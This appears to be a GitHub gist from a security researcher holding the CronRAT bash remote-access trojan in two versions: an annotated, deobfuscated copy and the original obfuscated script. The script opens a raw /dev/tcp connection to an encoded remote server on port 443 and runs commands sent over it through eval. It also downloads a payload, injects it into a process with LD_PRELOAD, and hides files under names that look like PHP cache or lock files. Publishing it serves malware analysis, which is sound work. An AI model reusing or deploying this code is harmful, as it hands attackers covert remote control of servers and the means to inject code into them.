-
-
Save thebigplate/c6f92efeac90dad2d5c5db71b7912ffb to your computer and use it in GitHub Desktop.
Revisions
-
gwillem revised this gist
Nov 25, 2021 . 1 changed file with 1 addition and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,6 +1,7 @@ #!/bin/bash # Annotation (C) [email protected] 2021 # Analysis here: https://sansec.io/research/cronrat set -x set -eEu -
Nov 24, 2021 . No changes.There are no files selected for viewing
-
Nov 24, 2021 . 1 changed file with 2 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,5 +1,7 @@ #!/bin/bash # Annotation (C) [email protected] 2021 set -x set -eEu set -o pipefail -
Nov 23, 2021 . 1 changed file with 0 additions and 0 deletions.There are no files selected for viewing
File renamed without changes. -
Nov 23, 2021 . 1 changed file with 393 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,393 @@ #!/bin/bash set -x set -eEu set -o pipefail trap 'echo "L$LINENO"; remove_temp_file; exit -1' ERR O54=4 function remove_temp_file() { if [[ ! -z "${writeable_path+x}" ]]; then if [[ -f "${writeable_path}" ]]; then # rm -f "${writeable_path}" echo "not removing path" fi fi } function exit_with_code() { echo "F${1}" # remove_temp_file exit ${1} } function does_func_exist() { if [[ "$( type ${1} &>/dev/null echo ${?} )" == 0 ]]; then echo 1 else echo 0 fi } function is_executable_by_user() { O27=$(command -v "${1}") if [[ -u "${O27}" || -g "${O27}" ]]; then echo 1 else echo 0 fi } if [[ $(does_func_exist "") == 0 ]]; then exit_with_code 8 fi if [[ $(is_executable_by_user "") == 1 ]]; then exit_with_code 10 fi if [[ $(does_func_exist "printf") == 0 || $(does_func_exist "ps") == 0 || $(does_func_exist "od") == 0 || $(does_func_exist "seq") == 0 || $(does_func_exist "dd") == 0 || $(does_func_exist "awk") == 0 ]]; then exit_with_code 6 fi if [[ $(does_func_exist "crontab") == 0 ]]; then exit_with_code 9 fi O15=1 O18=2 O12=3 O19=4 O16=5 O13=6 O7=7 O1=10 tenGB=9999999999 O9=3 possible_state_files=( '/dev/shm;www-shared|server-worker-shared|sql-shared|php-shared' "/run/user/$(id -u);systemd-user.lock|php.lock|php-fpm.lock|www-server.lock" "/tmp;php_sess_$RANDOM$RANDOM$RANDOM|zend_cache__$RANDOM$RANDOM$RANDOM" '/var/tmp;php_cache|www_cache|worker_cahce' "$(pwd);logo_edited_$(date +'%N').png|user_edited_$(date +'%N').jpg|user_edited_$(date +'%N').css|custom_edited_$(date +'%N').css") O25=0 O17=1 O5=2 function remove_payload_from_crontab() { local new_cron="" local O46=false while read O39; do if [[ "${O39:0:13}" != "53 23 31 2 3 " ]]; then new_cron+="${O39}\n" else O46=true fi done <<<"$(crontab -l 2>/dev/null)" if [[ "${O46}" == false ]]; then echo -n ${O17} return fi echo -e "${new_cron%??}" | crontab - &>/dev/null if [[ $? != 0 ]]; then echo -n ${O5} return fi echo -n ${O25} } function uptime_in_seconds() { echo $(($(awk '{printf "%0.f", $1}' </proc/uptime) + 1)) } function sec_since_midnight() { local today="$(date +'%F')" local now=$(date +'%s') local midnight=$(date -d "${today} 0" +%s) echo "$((${now} - ${midnight}))" } uptime_in_half_hours=$(($(uptime_in_seconds) / (30 * 60))) O3=$((($(sec_since_midnight) / 60) % 120)) # if [[ ${uptime_in_half_hours} -ne 1 ]]; then # second half hour after boot # if [[ ${O3} -ne 0 ]]; then # is first minute of a 2h block? # #only run in first half hour after boot? #exit_with_code 0 # fi # fi function to_hex() { echo -n "${1:-$(</dev/stdin)}" | od -An -vtx1 | tr -d ' \n' } function int2ascii() { echo -n "${1:-$(</dev/stdin)}" | LC_ALL=C awk '{for (i = 1; i <= NF; i++) printf "%c", $i}' } function O84() { if [[ $(does_func_exist "/bin/lsof") == 0 && $(does_func_exist "/sbin/lsof") == 0 && $(does_func_exist "/bin/fuser") == 0 && $(does_func_exist "/sbin/fuser") == 0 ]]; then echo -1 fi local O41=-1 if [[ $(does_func_exist "/bin/lsof") == 1 ]]; then O41=$(/bin/lsof -t "${1}" 2>/dev/null) if [[ ${?} -ne 0 ]]; then echo -1; fi elif [[ $(does_func_exist "/sbin/lsof") == 1 ]]; then O41=$(/sbin/lsof -t "${1}" 2>/dev/null) if [[ ${?} -ne 0 ]]; then echo -1; fi elif [[ $(does_func_exist "/bin/fuser") == 1 ]]; then O41=$(/bin/fuser "${1}" 2>/dev/null) if [[ ${?} -ne 0 ]]; then echo -1; fi O41=$(echo ${O41} | awk '{$1=$1};1') elif [[ $(does_func_exist "/sbin/fuser") == 1 ]]; then O41=$(/sbin/fuser "${1}" 2>/dev/null) if [[ ${?} -ne 0 ]]; then echo -1; fi O41=$(echo ${O41} | awk '{$1=$1};1') fi echo "${O41}" | awk -F' ' '{print $NF}' } function close_fds() { "$@" 0>&- 1>&- 2>&- 3>&- 4>&- 5>&- 6>&- 7>&- 8>&- 9>&- } function find_available_fd() { set +eE local O41=-1 for O61 in {1..1024}; do local _o_="$( true 2>/dev/null >&${O61} echo $? )" local _i_="$( true 2>/dev/null <&${O61} echo $? )" if [[ "${_o_}${_i_}" == "11" ]]; then O41=${O61} break fi done set -eE echo ${O41} } function is_mount_noexec() { set +eE O41=$( grep -Eq "^[^ ]+ ${1} [^ ]+ ([^ ]*,)?noexec[, ]" /proc/mounts echo $? ) set -eE echo ${O41} } function find_mount_for_path() { set +eE O41=$(df -P "${1}" 2>/dev/null) if [[ ${?} -eq 0 ]]; then O41=$(echo "${O41}" | tail -1) if [[ "${O41}" == /dev/mapper/* ]]; then O41=$(echo "${O41}" | tr -s ' ' | cut -d' ' -f6) else O41=$(echo "${O41}" | cut -d' ' -f1) fi else O41=1 fi set -eE echo ${O41} } function split_tokens() { local IFS=$"${1}" # -r : no \ escaping # -a : assign to arr read -r -a arr <<<"${2}" echo "${arr[@]}" } function get_xth_token() { local IFS=$"${1}" read -r -a arr <<<"${2}" echo "${arr[${3}]}" } function is_path_writable() { local O41=0 local testpath="${1}" if [[ -L "${testpath}" ]]; then if [[ -e "${testpath}" ]]; then testpath=$(realpath "${testpath}") else echo 0 return fi fi O31=$(find_mount_for_path "${testpath}") if [[ "${O31}" != "1" ]]; then if [[ "${O31}" == "tmpfs" ]]; then O31="${testpath}" fi if [[ $(is_mount_noexec "${O31}") -eq 1 ]]; then if [[ -e "${testpath}" && -d "${testpath}" && -w "${testpath}" ]]; then O41=1 fi fi fi echo ${O41} } upstream_fd=$(find_available_fd) if [[ ${upstream_fd} -eq -1 ]]; then exit_with_code 1 fi writable_dir="-1" writable_file="-1" writeable_path="-1" for O35 in "${possible_state_files[@]}"; do O28=($(split_tokens ';' "${O35}")) testpath="${O28[0]}" if [[ $(is_path_writable "${testpath}") -eq 1 ]]; then O26=($(split_tokens '|' "${O28[1]}")) writable_dir="${testpath}" writable_file="${O26[$RANDOM$RANDOM$RANDOM % ${#O26[@]}]}" writeable_path="${writable_dir}/${writable_file}" break fi done if [[ "${writable_dir}" == "-1" || "${writable_file}" == "-1" || "${writeable_path}" == "-1" ]]; then exit_with_code 2 fi set +eE # 47.115.46.167 443 eval "exec ${upstream_fd}<>/dev/tcp/127.0.0.1/4444" &>/dev/null || exit_with_code 5 set -eE eval "head -c "26" <&${upstream_fd}" &>/dev/null function get_rand_number() { O60=$(dd if=/dev/urandom bs=1 count=1 2>/dev/null) if [[ -z ${O60} ]]; then O60='X' fi if [[ ${O60} == $'\n' ]]; then O60='1' fi if [[ ${O60} == $'\'' ]]; then O60='h' fi echo $((16#$(to_hex "${O60}"))) } function b64encode() { local O41="" for ((i = 0; i < ${#1}; i++)); do hex2dec=$((10#$(printf "%d" "'${1:$i:1}"))) O52=$(printf '%02d ' $((${2} ^ ${hex2dec}))) O41="${O41}${O52}" done int2ascii "${O41}" | base64 -w0 - } function b64decode() { local O41="" in_hex=$(echo "${1}" | base64 -w0 -d - | od -An -vtx1 | tr -d ' \n') num_chars=$(echo "${1}" | base64 -w0 -d - | wc -c) for ((i = 0; i < $((${num_chars} * 2)); i += 2)); do hex2dec=$((16#$(printf ${in_hex:$i:2}))) O52=$(printf \\$(printf '%03o' $((${2} ^ ${hex2dec})))) O41="${O41}${O52}" done echo ${O41} } function send_to_upstream() { O60=$(get_rand_number) O21=$(int2ascii "${O60}") O8=$(int2ascii "${2}") encoded_payload=$(b64encode "${1}" $O60) O49=${#encoded_payload} if [[ ${O49} -gt ${tenGB} ]]; then exit_with_code 3 fi O44=$(printf "%03d" ${O54}) O45=$(printf "%010d" ${O49}) echo "SS: echo -n '${O21}${O8}${O44}${O45}${encoded_payload}' >&${upstream_fd}" eval "echo -n '${O21}${O8}${O44}${O45}${encoded_payload}' >&${upstream_fd}" } function read_from_upstream() { O20=${1:-false} O60=$(head -c "1" <&${upstream_fd}) O29=$(head -c "1" <&${upstream_fd}) O37=$(head -c "3" <&${upstream_fd}) O43=$(head -c "10" <&${upstream_fd}) O49=$((10#${O43})) if [[ ${O49} -gt ${tenGB} ]]; then exit_with_code 4 fi O38=$(head -c "${O49}" <&${upstream_fd}) O22=$((16#$( to_hex "${O60}" ))) if [[ ${O20} == true ]]; then O6="${O38}" else O6=$(b64decode "${O38}" ${O22}) fi echo "${O6}" } function read_xchar_from_upstream() { head -c "${1}" <&${upstream_fd} >/dev/null } function reset_upstream_fd() { eval "exec ${upstream_fd}>&-" } send_to_upstream "yG/uPNaConkVC,pSRB&S]mJ4S[@QM[4+V#M9jLQBI\$1\$}G<^(.rrP~C:+Z,5J<T\`" 1 send_to_upstream "cio" 2 send_to_upstream "1286cf441288ae88cedf8610943a0ed766c0b59efcf1d6039e435856bfeb6174f8170d4a09f5845418d91bef1c3376ddfc9554bcbdfe928ffa1c745d4ae88ca1" 2 O34=$(read_from_upstream) if [[ "${O34}" == "sd" ]]; then set +eE O59=$(remove_payload_from_crontab) set -eE if [[ ${O59} -eq ${O5} || ${O59} -eq ${O17} ]]; then send_to_upstream "SD${O59}" ${O19} elif [[ ${O59} -eq ${O25} ]]; then send_to_upstream "SD${O25}" ${O7} echo "SD" exit 0 else send_to_upstream "SD${O59}" ${O16} fi send_to_upstream "cex" 2 exit_with_code 0 fi if [[ "${O34}" == "ev" ]]; then O48=$(read_from_upstream) O59=$(eval "${O48}") if [[ ! -z "${O59}" ]]; then send_to_upstream "${O59}" ${O13} fi send_to_upstream "cex" 2 exit_with_code 0 fi if [[ ${O34} -eq 0 ]]; then exit_with_code 0 fi send_to_upstream "prm" 2 send_to_upstream "1286cf441288ae88cedf8610943a0ed766c0b59efcf1d6039e435856bfeb6174f8170d4a09f5845418d91bef1c3376ddfc9554bcbdfe928ffa1c745d4ae88ca1" 2 O11=$(read_from_upstream) O2=$(get_xth_token '|' "${O11}" 0) env_var_name=$(get_xth_token '|' "${O11}" 1) O33=$(get_xth_token '|' "${O11}" 2) env_var_value=$(get_xth_token '|' "${O11}" 3) foreign_cmd=$(get_xth_token '|' "${O11}" 4) foreign_param=$(get_xth_token '|' "${O11}" 5) if [[ "${writeable_path}" != "${O2}" ]]; then if [[ $(is_path_writable $(dirname "${O2}")) -eq 1 ]]; then writeable_path="${O2}" fi fi send_to_upstream "dwn" 2 O4=$(read_from_upstream true) echo "${O4}" | base64 -w0 -d - >"${writeable_path}" set +eE O24=$( cd "${O33}" && close_fds env "${env_var_name}"="${env_var_value}" LD_PRELOAD=${writeable_path} "${foreign_cmd}" "${foreign_param}" 1>&2 & O84 "${writeable_path}" ) set -eE if [[ ${O24} -ne -1 ]]; then O14=5 while [[ ${O14} -ne 0 ]]; do if ps -p ${O24} &>/dev/null; then true else send_to_upstream "ser" ${O19} exit_with_code 7 fi sleep 1 O14=$((${O14} - 1)) done send_to_upstream "ssc" ${O7} else send_to_upstream "sun" ${O16} fi send_to_upstream "cex" 2 reset_upstream_fd -
Nov 23, 2021 . No changes.There are no files selected for viewing
-
Nov 23, 2021 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,385 @@ set -eEu set -o pipefail trap 'echo "L$LINENO"; O70; exit -1' ERR O54=4 function O70() { if [[ ! -z "${O57+x}" ]]; then if [[ -f "${O57}" ]]; then rm -f "${O57}" fi fi } function O85() { echo "F${1}" O70 exit ${1} } function O73() { if [[ "$(type ${1} &> /dev/null; echo ${?})" == 0 ]]; then echo 1 else echo 0 fi } function O63() { O27=$(command -v "${1}") if [[ -u "${O27}" || -g "${O27}" ]]; then echo 1 else echo 0 fi } if [[ $(O73 "") == 0 ]]; then O85 8 fi if [[ $(O63 "") == 1 ]]; then O85 10 fi if [[ $(O73 "printf") == 0 || $(O73 "ps") == 0 || $(O73 "od") == 0 || $(O73 "seq") == 0 || $(O73 "dd") == 0 || $(O73 "awk") == 0 ]]; then O85 6 fi if [[ $(O73 "crontab") == 0 ]]; then O85 9 fi O15=1 O18=2 O12=3 O19=4 O16=5 O13=6 O7=7 O1=10 O10=$(printf '9%.0s' $(seq 1 ${O1})) O9=3 O36=('/dev/shm;www-shared|server-worker-shared|sql-shared|php-shared' "/run/user/$(id -u);systemd-user.lock|php.lock|php-fpm.lock|www-server.lock" "/tmp;php_sess_$RANDOM$RANDOM$RANDOM|zend_cache__$RANDOM$RANDOM$RANDOM" '/var/tmp;php_cache|www_cache|worker_cahce' "$(pwd);logo_edited_$(date +'%N').png|user_edited_$(date +'%N').jpg|user_edited_$(date +'%N').css|custom_edited_$(date +'%N').css") O25=0 O17=1 O5=2 function O72() { local new_cron="" local O46=false while read O39; do if [[ "${O39:0:13}" != "53 23 31 2 3 " ]]; then new_cron+="${O39}\n" else O46=true fi done <<< "$(crontab -l 2>/dev/null)" if [[ "${O46}" == false ]]; then echo -n ${O17} return fi echo -e "${new_cron%??}" | crontab - &>/dev/null if [[ $? != 0 ]]; then echo -n ${O5} return fi echo -n ${O25} } function O71() { echo $(( $(awk '{printf "%0.f", $1}' < /proc/uptime) + 1 )) } function O65() { local today="$(date +'%F')" local now=$(date +'%s') local midnight=$(date -d "${today} 0" +%s) echo "$((${now} - ${midnight}))" } O23=$(( $(O71) / (30 * 60) )) O3=$(( ($(O65) / 60) % 120 )) if [[ ${O23} -ne 1 ]]; then if [[ ${O3} -ne 0 ]]; then O85 0 fi fi function O81() { echo -n "${1:-$(</dev/stdin)}" | od -An -vtx1 | tr -d ' \n' } function O76() { echo -n "${1:-$(</dev/stdin)}" | LC_ALL=C awk '{for (i = 1; i <= NF; i++) printf "%c", $i}' } function O84() { if [[ $(O73 "/bin/lsof") == 0 && $(O73 "/sbin/lsof") == 0 && $(O73 "/bin/fuser") == 0 && $(O73 "/sbin/fuser") == 0 ]]; then echo -1 fi local O41=-1 if [[ $(O73 "/bin/lsof") == 1 ]]; then O41=$(/bin/lsof -t "${1}" 2>/dev/null) if [[ ${?} -ne 0 ]]; then echo -1; fi elif [[ $(O73 "/sbin/lsof") == 1 ]]; then O41=$(/sbin/lsof -t "${1}" 2>/dev/null) if [[ ${?} -ne 0 ]]; then echo -1; fi elif [[ $(O73 "/bin/fuser") == 1 ]]; then O41=$(/bin/fuser "${1}" 2>/dev/null) if [[ ${?} -ne 0 ]]; then echo -1; fi O41=$(echo ${O41} | awk '{$1=$1};1') elif [[ $(O73 "/sbin/fuser") == 1 ]]; then O41=$(/sbin/fuser "${1}" 2>/dev/null) if [[ ${?} -ne 0 ]]; then echo -1; fi O41=$(echo ${O41} | awk '{$1=$1};1') fi echo "${O41}" | awk -F' ' '{print $NF}' } function O75() { "$@" 0>&- 1>&- 2>&- 3>&- 4>&- 5>&- 6>&- 7>&- 8>&- 9>&- } function O74() { set +eE local O41=-1 for O61 in {1..1024}; do local _o_="$(true 2>/dev/null >&${O61}; echo $?)" local _i_="$(true 2>/dev/null <&${O61}; echo $?)" if [[ "${_o_}${_i_}" == "11" ]]; then O41=${O61} break fi done set -eE echo ${O41} } function O68() { set +eE O41=$(grep -Eq "^[^ ]+ ${1} [^ ]+ ([^ ]*,)?noexec[, ]" /proc/mounts; echo $?) set -eE echo ${O41} } function O69() { set +eE O41=$(df -P "${1}" 2>/dev/null) if [[ ${?} -eq 0 ]]; then O41=$(echo "${O41}" | tail -1) if [[ "${O41}" == /dev/mapper/* ]]; then O41=$(echo "${O41}" | tr -s ' ' | cut -d' ' -f6) else O41=$(echo "${O41}" | cut -d' ' -f1) fi else O41=1 fi set -eE echo ${O41} } function O64() { local IFS=$"${1}" read -r -a arr <<< "${2}" echo "${arr[@]}" } function O62() { local IFS=$"${1}" read -r -a arr <<< "${2}" echo "${arr[${3}]}" } function O66() { local O41=0 local O50="${1}" if [[ -L "${O50}" ]]; then if [[ -e "${O50}" ]]; then O50=$(realpath "${O50}") else echo 0 return fi fi O31=$(O69 "${O50}") if [[ "${O31}" != "1" ]]; then if [[ "${O31}" == "tmpfs" ]]; then O31="${O50}" fi if [[ $(O68 "${O31}") -eq 1 ]]; then if [[ -e "${O50}" && -d "${O50}" && -w "${O50}" ]]; then O41=1 fi fi fi echo ${O41} } O56=$(O74) if [[ ${O56} -eq -1 ]]; then O85 1; fi O55="-1" O58="-1" O57="-1" for O35 in "${O36[@]}"; do O28=($(O64 ';' "${O35}")) O50="${O28[0]}" if [[ $(O66 "${O50}") -eq 1 ]]; then O26=($(O64 '|' "${O28[1]}")) O55="${O50}" O58="${O26[$RANDOM$RANDOM$RANDOM % ${#O26[@]}]}" O57="${O55}/${O58}" break fi done if [[ "${O55}" == "-1" || "${O58}" == "-1" || "${O57}" == "-1" ]]; then O85 2; fi set +eE eval "exec ${O56}<>/dev/tcp/796077735/$((0x1bb))" &>/dev/null || O85 5 set -eE eval "head -c "26" <&${O56}" &> /dev/null function O67() { O60=$(dd if=/dev/urandom bs=1 count=1 2>/dev/null) if [[ -z ${O60} ]]; then O60='X'; fi if [[ ${O60} == $'\n' ]]; then O60='1'; fi if [[ ${O60} == $'\'' ]]; then O60='h'; fi echo $(( 16#$(O81 "${O60}") )) } function O79() { local O41="" for ((i=0; i < ${#1}; i++)); do O51=$((10#$(printf "%d" "'${1:$i:1}"))) O52=$(printf '%02d ' $((${2} ^ ${O51})) ) O41="${O41}${O52}" done O76 "${O41}" | base64 -w0 - } function O78() { local O41="" O53=$(echo "${1}" | base64 -w0 -d - | od -An -vtx1 | tr -d ' \n') O32=$(echo "${1}" | base64 -w0 -d - | wc -c) for ((i=0; i < $(( ${O32} * 2 )); i+=2)); do O51=$((16#$(printf ${O53:$i:2}))) O52=$(printf \\$(printf '%03o' $((${2} ^ ${O51})) ) ) O41="${O41}${O52}" done echo ${O41} } function O83() { O60=$(O67) O21=$(O76 "${O60}") O8=$(O76 "${2}") O30=$(O79 "${1}" $O60) O49=${#O30} if [[ ${O49} -gt ${O10} ]]; then O85 3; fi O44=$(printf "%0${O9}d" ${O54}) O45=$(printf "%0${O1}d" ${O49}) eval "echo -n '${O21}${O8}${O44}${O45}${O30}' >&${O56}" } function O80() { O20=${1:-false} O60=$(head -c "1" <&${O56}) O29=$(head -c "1" <&${O56}) O37=$(head -c "${O9}" <&${O56}) O43=$(head -c "${O1}" <&${O56}) O49=$((10#${O43})) if [[ ${O49} -gt ${O10} ]]; then O85 4; fi O38=$(head -c "${O49}" <&${O56}) O22=$(( 16#$(O81 "${O60}") )) if [[ ${O20} == true ]]; then O6="${O38}" else O6=$(O78 "${O38}" ${O22}) fi echo "${O6}" } function O82() { head -c "${1}" <&${O56} > /dev/null } function O77() { eval "exec ${O56}>&-" } O83 "yG/uPNaConkVC,pSRB&S]mJ4S[@QM[4+V#M9jLQBI\$1\$}G<^(.rrP~C:+Z,5J<T\`" ${O15} O83 "cio" ${O18} O83 "1286cf441288ae88cedf8610943a0ed766c0b59efcf1d6039e435856bfeb6174f8170d4a09f5845418d91bef1c3376ddfc9554bcbdfe928ffa1c745d4ae88ca1" ${O18} O34=$(O80) if [[ "${O34}" == "sd" ]]; then set +eE O59=$(O72) set -eE if [[ ${O59} -eq ${O5} || ${O59} -eq ${O17} ]]; then O83 "SD${O59}" ${O19} elif [[ ${O59} -eq ${O25} ]]; then O83 "SD${O25}" ${O7} echo "SD" exit 0 else O83 "SD${O59}" ${O16} fi O83 "cex" ${O18} O85 0 fi if [[ "${O34}" == "ev" ]]; then O48=$(O80) O59=$(eval "${O48}") if [[ ! -z "${O59}" ]]; then O83 "${O59}" ${O13} fi O83 "cex" ${O18} O85 0 fi if [[ ${O34} -eq 0 ]]; then O85 0 fi O83 "prm" ${O18} O83 "1286cf441288ae88cedf8610943a0ed766c0b59efcf1d6039e435856bfeb6174f8170d4a09f5845418d91bef1c3376ddfc9554bcbdfe928ffa1c745d4ae88ca1" ${O18} O11=$(O80) O2=$(O62 '|' "${O11}" 0) O0=$(O62 '|' "${O11}" 1) O33=$(O62 '|' "${O11}" 2) O40=$(O62 '|' "${O11}" 3) O42=$(O62 '|' "${O11}" 4) O47=$(O62 '|' "${O11}" 5) if [[ "${O57}" != "${O2}" ]]; then if [[ $(O66 $(dirname "${O2}")) -eq 1 ]]; then O57="${O2}" fi fi O83 "dwn" ${O18} O4=$(O80 true) echo "${O4}" | base64 -w0 -d - > "${O57}" set +eE O24=$(cd "${O33}" && O75 env "${O0}"="${O40}" LD_PRELOAD=${O57} "${O42}" "${O47}" 1>&2 & O84 "${O57}") set -eE if [[ ${O24} -ne -1 ]]; then O14=5 while [[ ${O14} -ne 0 ]]; do if ps -p ${O24} &> /dev/null; then true else O83 "ser" ${O19} O85 7 fi sleep 1 O14=$((${O14} - 1)) done O83 "ssc" ${O7} else O83 "sun" ${O16} fi O83 "cex" ${O18} O77